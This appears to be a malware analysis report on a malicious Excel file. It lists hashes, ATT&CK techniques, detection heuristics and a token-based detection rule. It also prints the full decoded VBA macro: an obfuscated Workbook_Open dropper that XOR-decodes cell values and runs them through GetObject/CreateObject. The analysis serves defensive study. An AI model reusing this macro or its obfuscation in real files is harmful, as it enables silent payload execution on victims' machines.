Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 11a91fa719687fcb…

MALICIOUS

Office (OLE) / .XLS

67.0 KB Created: 2023-09-10 08:03:05 Authoring application: Microsoft Excel First seen: 2023-09-13
MD5: c9746528d65dfe72dee3426f31067f44 SHA-1: 57787d9538ece2fcf5d3edf5a60cf71b8a9e4cf8 SHA-256: 11a91fa719687fcb9d78b114a13fc5013af823a82a7f4c362a52042b41e0f24f
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro. High-severity heuristics indicate the use of CreateObject and GetObject, common for executing malicious code. The VBA macro code, though partially obfuscated, appears to be designed to download and execute a second-stage payload, likely leveraging the CreateObject and GetObject functions for execution.

Heuristics 5

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
                       GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
                       GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
              Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4310 bytes
SHA-256: 7e5d52c65e1dce05cb378373130ac36532e010133055b847aecc0c8f81e5bdfd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit






                                                        Private Function Mills(ByVal TorTure As String) As Variant
Dim Displaying As Long: Displaying = 0: Dim Genes() As Byte







             




                  Dim ExaminEd() As Byte, ExpEnditurE As String, Personalized As Integer, GanGbanG As Integer, Destruction As Integer
ExaminEd = "gc4263a9ce"








             GoTo RemaRks
ExtEnsions:






                                        






                                        If Displaying < UBound(Genes) Then






          Personalized = Displaying Mod (10)







          Destruction = ExaminEd(Personalized * 2)






                                                                    GanGbanG = Genes(Displaying)








                                                        GoTo Mistake








                                                                        




              




Overnight:








                                                ExpEnditurE = ExpEnditurE & Chr(Genes(Displaying))







                




          Displaying = Displaying + 1





                                                    GoTo ExtEnsions
Else







              GoTo DiviDeD







                                                                End If







DiviDeD:






                                                                    Mills = ExpEnditurE
Exit Function
RemaRks:







            Genes = Equation(TorTure)








                                                                GoTo ExtEnsions
Mistake:
Genes(Displaying) = Abs(GanGbanG Xor Destruction)
GoTo Overnight





                 End Function
Private Sub Florence(ByVal Ottawa As String, ByVal AnimAted As String, ByVal Fisting As String, ByVal Chapters As String, ByVal Noticed As String)








                                                        






                   GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0
End Sub






           






          Sub Workbook_Open()







                                                            Florence Mills(Sheets("l747f").Range("E150").Value), Mills(Sheets("l747f").Range("F186").Value), Mills(Sheets("l747f").Range("F124").Value), Mills(Sheets("l747f").Range("H114").Value), Mills(Sheets("l747f").Range("H162").Value)






               End Sub







                 Private Function Equation(ByVal Introduce As String) As Variant








                                                                







           Dim ExpEnditurE() As Byte, i As Long, Personalized As Integer, Lycos As Integer
Lycos = Len(Introduce) / 2: i = 0: ReDim ExpEnditurE(0 To Lycos) As Byte
Destruction:
If i < Len(Introduce) Then






                                                                            Personalized = Personalized + 1
ExpEnditurE(Personalized - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Introduce, i + 1, 2)
i = i + 2
GoTo Destruction








               





                                                                Else








                                                            GoTo Victim
Dim Mistake As String
Mistake = InputBox("celp lape")







                 End If





                







Victim:
Equation = ExpEnditurE
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True